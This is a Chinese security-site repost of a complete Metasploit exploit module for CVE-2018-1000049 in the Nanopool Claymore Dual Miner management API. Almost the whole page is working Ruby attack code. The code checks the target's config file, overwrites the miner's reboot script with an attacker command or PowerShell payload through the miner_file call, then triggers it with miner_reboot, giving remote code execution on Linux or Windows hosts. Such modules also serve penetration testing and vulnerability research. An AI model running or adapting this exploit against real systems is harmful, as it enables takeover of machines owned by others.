首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nanopool Claymore Dual Miner APIs Remote Code Execution
来源:metasploit.com 作者:phra@snado 发布时间:2018-07-17  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Nanopool Claymore Dual Miner APIs RCE',
      'Description'     => %q{
        This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
      },
      'Author'          =>
        [
          'reversebrain@snado', # Vulnerability reporter
          'phra@snado'          # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['EDB', '44638'],
          ['CVE', '2018-1000049'],
          ['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
        ],
      'Platform'        => ['win', 'linux'],
      'Targets'         =>
        [
          [ 'Automatic Target', { 'auto' => true }],
          [ 'Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X64,
              'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
            }
          ],
          [ 'Windows',
            {
              'Platform' => 'windows',
              'Arch' => ARCH_X64,
              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
            }
          ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00"
        },
      'DisclosureDate'  => 'Feb 09 2018',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
      ])
    deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
  end

  def select_target
    data = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_getfile',
      "params"  => ['config.txt']
    }.to_json
    connect
    sock.put(data)
    buf = sock.get_once || ''
    tmp = StringIO.new
    tmp << buf
    tmp2 = tmp.string
    hex = ''
    if tmp2.scan(/\w+/)[7]
      return self.targets[2]
    elsif tmp2.scan(/\w+/)[5]
      return self.targets[1]
    else
      return nil
    end
  end

  def check
    target = select_target
    if target.nil?
      return Exploit::CheckCode::Safe
    end
    data = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_getfile',
      "params"  => ['config.txt']
    }.to_json
    connect
    sock.put(data)
    buf = sock.get_once || ''
    tmp = StringIO.new
    tmp << buf
    tmp2 = tmp.string
    hex = ''
    case target['Platform']
    when 'linux'
      hex = tmp2.scan(/\w+/)[5]
    when 'windows'
      hex = tmp2.scan(/\w+/)[7]
    end
    str = Rex::Text.hex_to_raw(hex)
    if str.include?('WARNING')
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Detected
    end
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    vprint_error(e.message)
    return Exploit::CheckCode::Unknown
  ensure
    disconnect
  end

  def execute_command(cmd, opts = {})
    target = select_target
    case target['Platform']
    when 'linux'
      cmd = Rex::Text.to_hex(cmd, '')
      upload = {
        "id"      => 0,
        "jsonrpc" => '2.0',
        "method"  => 'miner_file',
        "params"  => ['reboot.bash', "#{cmd}"]
      }.to_json
    when 'windows'
      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
      upload = {
        "id"      => 0,
        "jsonrpc" => '2.0',
        "method"  => 'miner_file',
        "params"  => ['reboot.bat', "#{cmd}"]
      }.to_json
    end

    connect
    sock.put(upload)
    buf = sock.get_once || ''
    trigger_vulnerability
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    fail_with(Failure::UnexpectedReply, e.message)
  ensure
    disconnect
  end

  def trigger_vulnerability
    execute = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_reboot'
    }.to_json
    connect
    sock.put(execute)
    buf = sock.get_once || ''
    disconnect
  end

  def exploit
    target = select_target
    if target.nil?
      fail_with(Failure::NoTarget, 'No matching target')
    end
    if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
      (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
      fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
    end
    case target['Platform']
    when 'linux'
      execute_cmdstager(flavor: :echo, linemax: 100000)
    when 'windows'
      execute_cmdstager(flavor: :vbs, linemax: 100000)
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/Ubuntu Coredump Reading
·QNAP Q'Center change_passwd Co
·Hadoop YARN ResourceManager Un
·Microsoft Windows .library-ms
·Microsoft Windows POP/MOV SS L
·Microsoft Windows Enterprise M
·G DATA Total Security 25.4.0.3
·HomeMatic Zentrale CCU2 Unauth
·Manage Engine Exchange Reporte
·Linux BPF Sign Extension Local
·Apache CouchDB Arbitrary Comma
·JavaScript Core Arbitrary Code
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved